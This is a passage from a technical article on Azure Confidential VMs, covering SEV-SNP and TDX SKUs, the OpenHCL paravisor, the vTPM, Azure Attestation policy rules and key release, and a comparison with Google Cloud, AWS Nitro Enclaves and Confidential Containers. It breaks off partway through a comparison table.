    Rail1[&quot;Rail 1 -- Confidentiality + Integrity&quot;] --&amp;gt; Mem[&quot;Encrypted DRAM -- + RMP / PAMT -- + encrypted register state&quot;]
    Rail2[&quot;Rail 2 -- Measurement + Attestation&quot;] --&amp;gt; Ev[&quot;Evidence: -- SNP_REPORT / TD Quote -- + vTPM quote&quot;]
    Ev --&amp;gt; Ver[&quot;Verifier: -- MAA / Intel Trust Authority&quot;]
    Ver --&amp;gt; Tok[&quot;Attestation Result -- (signed JWT)&quot;]
    Tok --&amp;gt; RP[&quot;Relying Party -- (Azure Key Vault)&quot;]
    RP --&amp;gt; Secret[&quot;Wrapped secret release&quot;]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A Confidential VM is not a memory-encryption product. It is a contract: confidentiality with integrity, plus an evidence-bearing attestation chain that a relying party can verify before it releases a secret. Anyone who sells you &quot;confidential&quot; infrastructure without rail 2 is selling you half the product.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If this is the contract, how does Azure actually build a usable Windows-guest CVM on top of it? What lives where, and who signs what?&lt;/p&gt;
&lt;h2&gt;6. State of the art on Azure: from silicon to MAA&lt;/h2&gt;
&lt;p&gt;July 20, 2022. Microsoft Azure announces general availability of the DCasv5 and ECasv5 confidential VM SKUs on AMD third-generation EPYC silicon. The Register&apos;s coverage captures the framing: &quot;Microsoft is expanding its Azure confidential computing portfolio with virtual machines that use the encryption and memory protection features of AMD&apos;s third-gen Epyc processors. ... Customers using them can also use the free Microsoft Azure Attestation (MAA) service to remotely verify the operating environment and integrity of the software binaries running on it&quot; [@theregister-azure-cvm]. That is the moment a confidential VM stops being a research paper and starts being a product the customer can pay for by the hour.&lt;/p&gt;
&lt;p&gt;This section walks the Azure stack bottom-up. It is the longest section because it is the article&apos;s reason to exist.&lt;/p&gt;
&lt;h3&gt;The Azure CVM SKU family&lt;/h3&gt;
&lt;p&gt;Microsoft Learn&apos;s confidential-computing products page enumerates the current Azure CVM SKU map. On AMD SEV-SNP: &quot;DCasv5 and ECasv5 enable rehosting of existing workloads&quot; [@msdocs-overview-products]. These are the third-generation EPYC Milan SKUs that went GA in July 2022. The Learn page continues: &quot;DCasv6 and ECasv6 confidential VMs based on fourth-generation AMD EPYC processors are currently in gated preview&quot; [@msdocs-overview-products]. Lenovo Press corroborates that &quot;SEV-SNP is supported on AMD EPYC processors starting with the AMD EPYC 7003 series processors&quot; -- i.e., Milan -- with the third-generation 7003 series being the first SEV-SNP silicon [@lenovo-lp1893].&lt;/p&gt;
&lt;p&gt;On Intel TDX: &quot;DCesv5 and ECesv5&quot; are the fourth-generation Xeon Sapphire Rapids SKUs, generally available. SecurityWeek&apos;s coverage anchors the Sapphire Rapids launch: &quot;Intel announced on Tuesday that it has added Intel Trust Domain Extensions (TDX) to its confidential computing portfolio with the launch of its new 4th Gen Xeon enterprise processors. ... The feature will be available through cloud providers such as Microsoft, Google, IBM and Alibaba&quot; [@securityweek-tdx]. Wikipedia notes that &quot;TDX is available for 5th generation Intel Xeon processors (codename Emerald Rapids) and Edge Enhanced Compute variants of 4th generation Xeon processors (codename Sapphire Rapids)&quot; [@wiki-tdx]. The fifth-generation Emerald Rapids SKUs DCesv6 and ECesv6 are in preview at the time of writing, per the Learn products page [@msdocs-overview-products].&lt;/p&gt;
&lt;p&gt;GPU CVMs anchor on the same CPU-side TEEs and add a GPU TEE. The Learn page describes the NCCadsH100v5 SKU: &quot;NCCadsH100v5 confidential VMs come with a GPU ... use linked CPU and GPU Trusted Execution Environments (TEEs)&quot; [@msdocs-overview-products]. This is the linked-attestation product for confidential AI -- a SEV-SNP host CVM bound by attestation to an NVIDIA H100 in Confidential Compute mode.March 30, 2026 brings a pricing change customers should plan for. Microsoft Learn states: &quot;From March 30 2026, encrypted OS disks will incur higher costs&quot; [@msdocs-azure-cvm]. Confidential OS-disk encryption remains the recommended configuration where the workload requires it; the change is to the billing line, not to the architecture.&lt;/p&gt;
&lt;h3&gt;The paravisor: OpenHCL on OpenVMM&lt;/h3&gt;
&lt;p&gt;The single most important productisation move Azure made is what Microsoft calls a &lt;em&gt;paravisor&lt;/em&gt;. The framing from the October 17, 2024 Tech Community announcement is verbatim: &quot;Microsoft developed the first paravisor in the industry, and for years, we have been enhancing the paravisor offered to Azure customers. This effort now culminates in the release of a new, open source paravisor, called OpenHCL&quot; [@openhcl-blog].&lt;/p&gt;

A thin operating system running inside the trust boundary of a confidential VM, between the host hypervisor and the customer guest. The paravisor exposes the synthetic devices, the vTPM, and the GPA partitioning that a Windows or Linux guest expects from a Hyper-V environment -- without trusting any of those services to the host below the trust boundary. The paravisor is itself part of the TCB, but on Azure the paravisor binary is open source [@openhcl-blog; @openvmm-repo].

Microsoft&apos;s open-source paravisor, released on October 17, 2024. OpenHCL is built on top of OpenVMM, &quot;a modular, cross-platform Virtual Machine Monitor (VMM), written in Rust&quot; [@openvmm-repo]. On Azure SEV-SNP CVMs OpenHCL runs at VMPL0; on TDX CVMs it runs in the L1 partition seat under TD Partitioning [@openhcl-blog; @openvmm-dev]. It mediates virtual devices, brokers the vTPM, manages GPA partitioning between private and shared pages, and handles diagnostics, all inside the trust boundary.

Microsoft developed the first paravisor in the industry, and for years, we have been enhancing the paravisor offered to Azure customers. This effort now culminates in the release of a new, open source paravisor, called OpenHCL. -- Microsoft Tech Community, OpenHCL announcement, October 17, 2024 [@openhcl-blog]
&lt;p&gt;The OpenVMM repository README puts the focus crisply: &quot;OpenVMM is a modular, cross-platform Virtual Machine Monitor (VMM), written in Rust. Although it can function as a traditional VMM, OpenVMM&apos;s development is currently focused on its role in the OpenHCL paravisor&quot; [@openvmm-repo]. The OpenVMM Guide lists the virtualisation APIs OpenVMM supports, including &quot;MSHV (using VSM / TDX / SEV-SNP)&quot; for paravisor mode, WHP for a Windows host, and KVM for a Linux host [@openvmm-dev]. The use cases listed include Azure Boost, Trusted Launch, and Confidential VMs.&lt;/p&gt;
&lt;p&gt;Because OpenHCL is in the TCB, customers do not avoid trusting Microsoft by running it -- but they can now &lt;em&gt;read the source&lt;/em&gt;. That is a categorical change from earlier closed paravisors. The point about a TCB is not its size but its auditability and reviewability.&lt;/p&gt;
&lt;p&gt;The canonical Linux-side analogue is AMD&apos;s &lt;strong&gt;Secure VM Service Module (SVSM)&lt;/strong&gt;, which runs at VMPL0 inside an SEV-SNP guest and provides the same kind of in-trust-boundary services (virtual TPM, paravirtualised I/O brokering, attestation surface) that OpenHCL provides on Azure [@amd-svsm]. SVSM and OpenHCL solve the same problem with different implementations and different signing chains. The Linux community&apos;s reference SVSM is the COCONUT-SVSM open-source project [@coconut-svsm]. A reader who needs a confidential-VM paravisor on a non-Azure Linux host should look at SVSM; a reader who needs it on Azure gets OpenHCL.&lt;/p&gt;
&lt;h3&gt;The vTPM&lt;/h3&gt;
&lt;p&gt;Inside the paravisor&apos;s protected memory, OpenHCL synthesises a per-VM virtual TPM. Microsoft Learn is verbatim: &quot;Azure confidential VMs feature a virtual TPM (vTPM) for Azure VMs. ... Confidential VMs have their own dedicated vTPM instance, which runs in a secure environment outside the reach of any VM&quot; [@msdocs-azure-cvm]. The architectural significance of this single sentence cannot be overstated. The vTPM&apos;s endorsement key is bound at provision time to the SEV-SNP or TDX hardware attestation report, so a vTPM quote can be transitively chained back to silicon: &lt;code&gt;vTPM quote -&amp;gt; EK certificate -&amp;gt; SNP_REPORT or TD Quote -&amp;gt; VCEK or Intel signing root&lt;/code&gt; [@msdocs-azure-cvm].&lt;/p&gt;
&lt;p&gt;The practical consequence is that a Windows Server CVM runs an unmodified Trusted Boot chain inside the guest. PCR-7 still indexes the Secure Boot signer. Code Integrity policies still extend their own PCRs. BitLocker still seals the Volume Master Key to the TPM. None of those operating-system features need to know that the TPM they are talking to is synthesised by OpenHCL inside an SEV-SNP guest -- and yet every one of those features is now anchored, transitively, to AMD or Intel silicon rather than to a discrete TPM chip on a motherboard the cloud customer cannot inspect.&lt;/p&gt;
&lt;h3&gt;Microsoft Azure Attestation&lt;/h3&gt;
&lt;p&gt;The verifier in Azure&apos;s confidential-computing stack is Microsoft Azure Attestation. The Learn overview describes it: &quot;Microsoft Azure Attestation is a unified solution for remotely verifying the trustworthiness of a platform and integrity of the binaries running inside it. The service supports attestation of the platforms backed by Trusted Platform Modules (TPMs) alongside the ability to attest to the state of Trusted Execution Environments (TEEs) such as Intel Software Guard Extensions (SGX) enclaves, Virtualization-based Security (VBS) enclaves ... and Azure confidential VMs&quot; [@msdocs-maa-overview].&lt;/p&gt;

Azure&apos;s unified verifier service for confidential platforms. MAA accepts evidence -- an SNP_REPORT or TD Quote, plus a vTPM quote, plus boot measurements -- evaluates it against a customer-defined attestation policy, and returns a signed JWT carrying the issued claims. MAA&apos;s role in the RATS architecture is the *verifier*, in *Passport* topology: the attester collects MAA&apos;s signed result and presents it to the relying party (Azure Key Vault) [@msdocs-maa-overview; @rfc9334].
&lt;p&gt;The SKR loop is documented verbatim. &quot;When a CVM boots up, SNP report containing the guest VM firmware measurements are sent to Azure Attestation. The service validates the measurements and issues an attestation token that is used to release keys from Managed-HSM or Azure Key Vault. These keys are used to decrypt the vTPM state of the guest VM, unlock the OS disk and start the CVM&quot; [@msdocs-maa-overview].&lt;/p&gt;

The Azure Key Vault / Managed HSM operation that releases a wrapped key only after the requesting party presents a valid Microsoft Azure Attestation token that satisfies the key&apos;s release policy. SKR is what closes the loop between rail 1 (memory protection) and rail 2 (attestation) at the customer&apos;s perimeter: a key never leaves the HSM unless the attesting CVM has been verified [@msdocs-maa-overview; @msdocs-azure-cvm].
&lt;h3&gt;MAA policy v1.2&lt;/h3&gt;
&lt;p&gt;The policy language is the operational surface customers actually interact with. The MAA policy v1.2 grammar has four segments, verbatim from the Microsoft Learn page: &quot;Policy version 1.2 has four segments: version, configurationrules, authorizationrules, issuancerules&quot; [@maa-policy-v12]. The critical operational distinction is between the last two. Authorization rules can fail attestation; issuance rules cannot. The docs are explicit: &quot;&lt;strong&gt;authorizationrules&lt;/strong&gt;: ... These rules can be used to fail attestation. &lt;strong&gt;issuancerules&lt;/strong&gt;: ... These rules can be used to add to the outgoing claim set and the response token. These rules can&apos;t be used to fail attestation&quot; [@maa-policy-v12].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The most common bug in hand-authored MAA policies is writing a security gate as an issuance rule. If you want a missing SecureBoot value to &lt;em&gt;reject&lt;/em&gt; the attestation, the predicate must live in &lt;code&gt;authorizationrules&lt;/code&gt;. Putting it in &lt;code&gt;issuancerules&lt;/code&gt; only adds a claim to the resulting JWT; the relying party then has to enforce the gate. The verifier will mint the token either way [@maa-policy-v12].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The configuration-rule defaults give you sane behaviour out of the box: &lt;code&gt;require_valid_aik_cert&lt;/code&gt; defaults to &lt;code&gt;true&lt;/code&gt; and &lt;code&gt;required_pcr_mask&lt;/code&gt; defaults to &lt;code&gt;0xFFFFFF&lt;/code&gt; (the first twenty-four PCRs must appear in the quote) [@maa-policy-v12].&lt;/p&gt;
&lt;p&gt;Claim extraction uses JmesPath. The Learn page reproduces a Secure Boot detection rule that the verifier can use to flip a &lt;code&gt;secureBootEnabled&lt;/code&gt; claim:&lt;/p&gt;
&lt;p&gt;{`
// Verbatim from Microsoft Learn (MAA policy v1.2 Secure Boot detection).
// This is JS-style pseudo-code that walks the rule structure, not
// runnable MAA syntax.&lt;/p&gt;
&lt;p&gt;const policyRule = {
  segment: &apos;issuancerules&apos;,
  // &quot;Claim rules&quot; use JmesPath queries against parsed event data.
  step1: {
    when: &apos;type == &quot;events&quot; &amp;amp;&amp;amp; issuer == &quot;AttestationService&quot;&apos;,
    add:  &apos;efiConfigVariables&apos;,
    via:  &quot;Events[?EventTypeString == &apos;EV_EFI_VARIABLE_DRIVER_CONFIG&apos; &quot; +
          &quot;&amp;amp;&amp;amp; ProcessedData.VariableGuid == &apos;8BE4DF61-93CA-11D2-AA0D-00E098032B8C&apos;]&quot;
  },
  // GUID 8BE4DF61-93CA-11D2-AA0D-00E098032B8C is the EFI Global Variable
  // namespace, which is where &apos;SecureBoot&apos; lives.
  step2: {
    issue: &apos;secureBootEnabled&apos;,
    via: &quot;[?ProcessedData.UnicodeName == &apos;SecureBoot&apos;] &quot; +
         &quot;| length(@) == 1 &amp;amp;&amp;amp; @[0].ProcessedData.VariableData == &apos;AQ&apos;&quot;
  },
  // &apos;AQ&apos; is base64(&apos;\x01&apos;), i.e. SecureBoot==1.
  fallback: { issue: &apos;secureBootEnabled&apos;, value: false }
};&lt;/p&gt;
&lt;p&gt;console.log(&apos;Segment :&apos;, policyRule.segment);                 // issuancerules
console.log(&apos;Yields  :&apos;, &apos;secureBootEnabled claim in JWT&apos;);
console.log(&apos;Lesson  :&apos;, &apos;Add this to authorizationrules to actually fail!&apos;);
`}&lt;/p&gt;

sequenceDiagram
    participant E as Evidence (SNP_REPORT + vTPM)
    participant C as configurationrules
    participant A as authorizationrules
    participant I as issuancerules
    participant J as Signed JWT
    E-&amp;gt;&amp;gt;C: parse + defaults -- (require_valid_aik_cert, PCR mask)
    C-&amp;gt;&amp;gt;A: typed claim set
    A--&amp;gt;&amp;gt;A: predicate checks
    alt All authorization rules pass
        A-&amp;gt;&amp;gt;I: continue
        I-&amp;gt;&amp;gt;J: mint claims (secureBootEnabled, x-ms-isolation-tee, ...)
        J--&amp;gt;&amp;gt;E: signed attestation token
    else Any authorization rule fails
        A--&amp;gt;&amp;gt;E: attestation rejected
    end
&lt;h3&gt;The two-axis privilege model: VMPL crossed with VTL&lt;/h3&gt;
&lt;p&gt;A common misconception is that a SEV-SNP CVM makes Virtualization-Based Security inside the guest redundant. The argument goes: &quot;the whole VM is in a TEE, so why do I still need a Secure Kernel?&quot; The architecture answers the question by saying that VMPL and VTL are orthogonal axes.&lt;/p&gt;
&lt;p&gt;The VMPL axis is &lt;em&gt;cloud-operator threat model&lt;/em&gt;. VMPL0 (the OpenHCL paravisor) sees pages that the customer&apos;s kernel at VMPL2 does not, and the host hypervisor below VMPL0 sees none of the encrypted memory at all. VMPL keeps the operator out.&lt;/p&gt;
&lt;p&gt;The VTL axis is &lt;em&gt;intra-guest threat model&lt;/em&gt;. Inside the guest, VTL1 hosts the Secure Kernel, IUM (Isolated User Mode) trustlets like LSAIso for Credential Guard, and the HVCI code-integrity verifier. VTL0 hosts the normal Windows kernel and user mode. VTL keeps a kernel-mode attacker out of LSA secrets and credential blobs. Without VTL, the customer&apos;s own kernel can read its own LSAIso heap; without VMPL, the hypervisor can read the customer&apos;s RAM.&lt;/p&gt;
&lt;p&gt;VBS-inside-CVM is therefore not a duplication. It closes two different attack classes.&lt;/p&gt;

flowchart TB
    subgraph Host[&quot;Host below trust boundary&quot;]
        H[&quot;Hyper-V host kernel -- (no access to encrypted RAM)&quot;]
    end
    subgraph Boundary[&quot;Inside SEV-SNP / TDX trust boundary&quot;]
        subgraph V0[&quot;VMPL0 / L1 TD partition&quot;]
            P[&quot;OpenHCL paravisor -- (synthetic devices, vTPM)&quot;]
        end
        subgraph V2[&quot;VMPL2 / L2 TD partition (customer guest)&quot;]
            subgraph T1[&quot;VTL1 (Secure Kernel)&quot;]
                SK[&quot;Secure Kernel -- + IUM trustlets: -- LSAIso, Credential Guard&quot;]
            end
            subgraph T0[&quot;VTL0 (normal OS)&quot;]
                W[&quot;Windows Server kernel -- + user mode&quot;]
            end
        end
    end
    H -. &quot;blocked by VMPL + -- RMP / PAMT&quot; .-&amp;gt; P
    W -. &quot;blocked by VTL 1 -- VBS / HVCI&quot; .-&amp;gt; SK
    P --&amp;gt; V2
&lt;h3&gt;Confidential Containers: three Azure surfaces&lt;/h3&gt;
&lt;p&gt;Confidential VMs are not the only Azure surface where SEV-SNP attestation can land. There are three more.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confidential Containers on Azure Container Instances (ACI), GA.&lt;/strong&gt; Microsoft Learn: &quot;Confidential containers on Azure Container Instances are deployed in a container group with a Hyper-V isolated TEE, which includes a memory encryption key generated and managed by an AMD SEV-SNP capable processor&quot; [@msdocs-aci-confidential]. ACI Confidential Containers use &lt;em&gt;confidential computing enforcement&lt;/em&gt; (CCE) policies generated by the &lt;code&gt;confcom&lt;/code&gt; Azure CLI extension, and they expose SNP attestation reports for the SKR sidecar pattern.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confidential Containers on AKS, preview, sunsetting.&lt;/strong&gt; The Learn AKS page is explicit: &quot;The Confidential Containers preview is set to sunset in March 2026. After this date, customers with existing Confidential Container node pools should expect to see reduced functionality, and you won&apos;t be able to spin up any new nodes with the &lt;code&gt;KataCcIsolation&lt;/code&gt; runtime&quot; [@msdocs-aks-confidential-containers]. Microsoft routes customers to four alternatives: Confidential VM AKS node pools, ACI Confidential Containers, ARO Confidential Containers, and the upstream Confidential Containers project [@msdocs-aks-confidential-containers].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confidential VM AKS worker nodes, GA.&lt;/strong&gt; A different model -- node-granularity CVM rather than per-pod CVM. Learn: &quot;AKS now supports confidential VM node pools with Azure confidential VMs. These confidential VMs are the generally available DCasv5 and ECasv5 confidential VM-series using 3rd Gen AMD EPYC processors with Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) security features&quot; [@msdocs-aks-cvm-nodes]. This is a lift-and-shift path for existing AKS workloads.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confidential Containers on ARO&lt;/strong&gt; is the Red Hat OpenShift equivalent, with Kata-isolated per-container SEV-SNP enforcement.&lt;/p&gt;
&lt;p&gt;The cross-cloud parallel is the CNCF Confidential Containers project, accepted to CNCF on March 8, 2022 at the Sandbox maturity level [@cncf-coco]. The project documentation describes it as &quot;an open source project that brings confidential computing to Cloud Native environments, using hardware technology to protect complex workloads&quot; [@coco-docs]. Trustee is the canonical attestation broker on the CNCF side. CoCo&apos;s substrate is Kata Containers&apos; MicroVM model; the TEE backing is currently Linux-only. The open-source community floor under all of this includes Edgeless&apos;s Constellation (historically the canonical confidential-Kubernetes distribution; the upstream repo was archived in 2025-2026 and Edgeless&apos;s successor project Contrast [@contrast] now carries the work forward at the workload-confidential-container layer rather than the whole-cluster layer) [@constellation], COCONUT-SVSM (the AMD-side reference SVSM running at VMPL0) [@coconut-svsm], and the CoCo Trustee attestation broker.&lt;/p&gt;
&lt;h3&gt;NVIDIA H100 CC on NCCadsH100v5&lt;/h3&gt;
&lt;p&gt;The Azure NCCadsH100v5 SKU pairs an SEV-SNP CVM with an NVIDIA H100 in Confidential Compute mode and links the two attestations together. CPU-side rail 1 is SEV-SNP. GPU-side rail 1 is H100 CC. Rail 2 must compose both: the relying party only releases the workload&apos;s key if both attestations check out. Cross-vendor attestation composition is one of the open standards problems §9 will revisit.&lt;/p&gt;

flowchart TB
    subgraph S[&quot;Silicon&quot;]
        AMD[&quot;AMD-SP firmware -- + SEV-SNP RMP&quot;]
        INTEL[&quot;Intel TDX Module -- (SEAM, SEAMRR)&quot;]
    end
    subgraph H[&quot;Host&quot;]
        HV[&quot;Azure Hyper-V -- (below trust boundary)&quot;]
    end
    subgraph P[&quot;Paravisor (in TCB)&quot;]
        OH[&quot;OpenHCL on OpenVMM -- VMPL0 / L1 TD seat&quot;]
        VT[&quot;vTPM synthesised -- by paravisor&quot;]
    end
    subgraph G[&quot;Customer guest&quot;]
        WS[&quot;Windows Server CVM -- (VTL0 + VTL1, VBS / HVCI)&quot;]
    end
    subgraph V[&quot;Verifier&quot;]
        MAA[&quot;Microsoft Azure Attestation -- (policy v1.2)&quot;]
    end
    subgraph R[&quot;Relying party&quot;]
        AKV[&quot;Azure Key Vault / -- Managed HSM (SKR)&quot;]
        APP[&quot;Customer application&quot;]
    end
    AMD --&amp;gt; HV
    INTEL --&amp;gt; HV
    HV --&amp;gt; OH
    OH --&amp;gt; VT
    OH --&amp;gt; WS
    WS -- &quot;SNP_REPORT -- or TD Quote -- + vTPM quote&quot; --&amp;gt; MAA
    MAA -- &quot;Signed JWT&quot; --&amp;gt; AKV
    AKV --&amp;gt; APP
&lt;p&gt;That is the Azure stack. But Azure is not the only design point -- Google and AWS chose different glue, and one of them is on a fundamentally different threat model. How do they compare?&lt;/p&gt;
&lt;h2&gt;7. Competing approaches&lt;/h2&gt;
&lt;p&gt;Three competitors share the design space with very different choices. Two are near-peers to Azure; one is a fundamentally different model that customers routinely confuse for the same product.&lt;/p&gt;
&lt;h3&gt;Google Cloud Confidential VMs&lt;/h3&gt;
&lt;p&gt;Google Cloud supports the same two CPU TEEs. The GCP Confidential VM docs are explicit: &quot;AMD Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) expands on SEV, adding hardware-based security to help prevent malicious hypervisor-based attacks like data replay and memory remapping. Attestation reports can be requested at any time directly from the AMD Secure Processor&quot; [@gcp-cvm-overview]. And on the Intel side: &quot;Intel Trust Domain Extensions (TDX) creates an isolated trust domain (TD) within a VM, and uses hardware extensions for managing and encrypting memory&quot; [@gcp-cvm-overview].&lt;/p&gt;
&lt;p&gt;GCP&apos;s machine-type mapping is direct. AMD SEV / SEV-SNP runs on N2D and C3D; Intel TDX runs on C3 Confidential VMs. The Confidential Computing product hub lists &quot;Confidential VMs on the C3 machine series brings hardware-level protection to your AI models and data&quot; and &quot;Confidential VMs on the accelerator-optimized A3 machine series with NVIDIA H100 GPUs&quot; as the parallel GPU-CC product [@gcp-confidential-overview]. There is a Confidential Space product on top for multi-party analytics, plus Confidential GKE Nodes and Confidential Dataflow.&lt;/p&gt;
&lt;p&gt;The verifier-of-record is Google&apos;s own attestation service, with the guest&apos;s vTPM as the default trust root. Intel Trust Authority is supported as a plug-in alternative for TDX evidence.&lt;/p&gt;

The GCP Confidential VM docs make a claim Azure does not match: &quot;AMD SEV machines that use the N2D and C3D machine types support live migration&quot; [@gcp-cvm-overview]. Live migration of a confidential VM is genuinely hard: the encrypted state has to be re-keyed under the destination host&apos;s per-VM key, and the integrity-rail structures (RMP entries) have to be coherently re-established without ever exposing the plaintext to either host. AMD&apos;s SEV migration helper is the underlying mechanism. Azure does not currently expose live migration on its confidential VM SKUs. This is the most operationally consequential cross-cloud difference today.
&lt;p&gt;A small correction to a widely repeated framing. It is sometimes said that GCP&apos;s confidential offerings are &quot;also SEV-SNP&quot; -- the Stage 0 input to this article said exactly that. Per the GCP docs, GCP supports &lt;strong&gt;both&lt;/strong&gt; SEV-SNP and TDX [@gcp-cvm-overview]. If you are picking a CVM cloud for a multi-vendor strategy, treat GCP as a near-peer to Azure on the CPU dimension and differentiate on the verifier, the SKU mapping, and the live-migration story instead.&lt;/p&gt;
&lt;h3&gt;AWS Nitro Enclaves: a genuinely different model&lt;/h3&gt;
&lt;p&gt;The most common confusion in this design space is the assumption that AWS Nitro Enclaves is &quot;AWS&apos;s confidential VM product.&quot; It is not. It is a different model on a different threat boundary.&lt;/p&gt;
&lt;p&gt;The Nitro Enclaves user guide is unambiguous about the threat model. &quot;AWS Nitro Enclaves is an Amazon EC2 feature that allows you to create isolated execution environments ... Enclaves are separate, hardened, and highly-constrained virtual machines. They provide only secure local socket connectivity with their parent instance. They have no persistent storage, interactive access, or external networking&quot; [@aws-nitro-enclaves]. The same page continues: &quot;Nitro Enclaves is processor agnostic and it is supported on most Intel, AMD, and AWS Graviton-based Amazon EC2 instance types built on the AWS Nitro System&quot; [@aws-nitro-enclaves]. And: &quot;Nitro Enclaves use the same Nitro Hypervisor technology that provides CPU and memory isolation for Amazon EC2 instances&quot; [@aws-nitro-enclaves].&lt;/p&gt;
&lt;p&gt;Three differences matter.&lt;/p&gt;
&lt;p&gt;First, there is no CPU memory cipher. Isolation is enforced by the Nitro hypervisor on a dedicated Nitro System card, not by SEV-SNP or TDX. Memory is in the clear in DRAM, just architecturally walled off by the hypervisor and the hardware root of trust below it.&lt;/p&gt;
&lt;p&gt;Second, attestation signs through the Nitro hypervisor and integrates with AWS KMS. There is no VCEK or TDX Quoting Enclave.&lt;/p&gt;
&lt;p&gt;Third, the threat model is parent-instance and co-tenant isolation, not cloud-operator isolation. Amazon is in the TCB by design. A subpoena or a compromised AWS operator are within the threat model of Azure / GCP CVMs and outside the threat model of Nitro Enclaves.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If your threat model includes a malicious or compelled cloud operator, AWS Nitro Enclaves does not protect you. The Nitro hypervisor enforces the enclave boundary; it is software AWS owns and operates. Use Nitro Enclaves for what it is good at -- a hardened compartment for key material against your own parent instance and your own application bugs. Use SEV-SNP / TDX on Azure or GCP if you need cryptographic protection against the operator&apos;s hypervisor [@aws-nitro-enclaves].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Nitro Enclaves still has a role: it is excellent at isolating a long-lived signing service from a more loosely audited application instance, and four enclaves per parent EC2 host is a generous concurrency budget for that pattern.&lt;/p&gt;
&lt;h3&gt;Confidential Containers and NVIDIA H100 CC&lt;/h3&gt;
&lt;p&gt;The Confidential Containers project crosses cloud boundaries. CNCF accepted it in March 2022 [@cncf-coco]. The project docs describe it as &quot;an open source project that brings confidential computing to Cloud Native environments, using hardware technology to protect complex workloads&quot; [@coco-docs]. The Azure surfaces (ACI, AKS, ARO) were covered in §6; the equivalent on AWS is the Kata Containers + Confidential Containers combination on top of bare-metal Nitro hosts, and on GCP it lands on Confidential GKE Nodes.&lt;/p&gt;
&lt;p&gt;The NVIDIA H100 CC story is roughly cross-cloud parity. Azure NCCadsH100v5 pairs SEV-SNP with H100 CC; Google&apos;s A3 series pairs Intel TDX with H100 CC. Cross-vendor attestation composition is the open standards problem on which the relying party experience still depends. On the silicon side, ARM&apos;s Confidential Compute Architecture (CCA, built on the Realm Management Extension, RME) is the ARM-side analogue of SEV-SNP/TDX, and Apple&apos;s Secure Enclave Processor is a board-scoped TEE with a different form factor; both are adjacent VM-scoped or board-scoped TEE designs but out of scope for the cloud-CVM body of this article.&lt;/p&gt;
&lt;h3&gt;The head-to-head matrix&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Azure CVM&lt;/th&gt;
&lt;th&gt;GCP CVM&lt;/th&gt;
&lt;th&gt;AWS Nitro Enclaves&lt;/th&gt;
&lt;th&gt;Confidential Containers&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;CPU TEE&lt;/td&gt;
&lt;td&gt;SEV-SNP, Intel TDX&lt;/td&gt;
&lt;td&gt;SEV / SEV-SNP, Intel TDX&lt;/td&gt;
&lt;td&gt;None (Nitro hypervisor)&lt;/td&gt;
&lt;td&gt;SEV-SNP, TDX (varies by host)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory cipher&lt;/td&gt;
&lt;td&gt;AES (per-VM, per-TD)&lt;/td&gt;
&lt;td&gt;AES (per-VM, per-TD)&lt;/td&gt;
&lt;td&gt;None (host RAM)&lt;/td&gt;
&lt;td&gt;Inherited from host TEE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Integrity rail&lt;/td&gt;
&lt;td&gt;RMP (AMD), PAMT (Intel)&lt;/td&gt;
&lt;td&gt;RMP, PAMT&lt;/td&gt;
&lt;td&gt;Nitro hypervisor isolation&lt;/td&gt;
&lt;td&gt;Inherited from host TEE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attestation evidence&lt;/td&gt;
&lt;td&gt;SNP_REPORT, TD Quote, vTPM quote&lt;/td&gt;
&lt;td&gt;SNP_REPORT, TD Quote, vTPM&lt;/td&gt;
&lt;td&gt;Nitro attestation document&lt;/td&gt;
&lt;td&gt;TEE evidence + container measurement&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verifier&lt;/td&gt;
&lt;td&gt;Microsoft Azure Attestation&lt;/td&gt;
&lt;td&gt;Google attestation, Intel Trust Authority&lt;/td&gt;
&lt;td&gt;AWS KMS&lt;/td&gt;
&lt;td&gt;Trustee (CNCF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operator threat model&lt;/td&gt;
&lt;td&gt;Yes (operator excluded)&lt;/td&gt;
&lt;td&gt;Yes (operator excluded)&lt;/td&gt;
&lt;td&gt;No (Nitro in TCB)&lt;/td&gt;
&lt;td&gt;Yes (operator excluded)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lift-and-shift Windows&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (custom enclave format)&lt;/td&gt;
&lt;td&gt;Linux containers only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Live migration of CVM&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (SEV on N2D / C3D)&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024-era CVE exposure&lt;/td&gt;
&lt;td&gt;CacheWarp, WeSee, Heckler (SEV-SNP); Heckler (TDX)&lt;/td&gt;
&lt;td&gt;Same upstream CVEs&lt;/td&gt;
&lt;td&gt;Distinct (Nitro hypervisor)&lt;/td&gt;
&lt;td&gt;Inherited from host TEE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
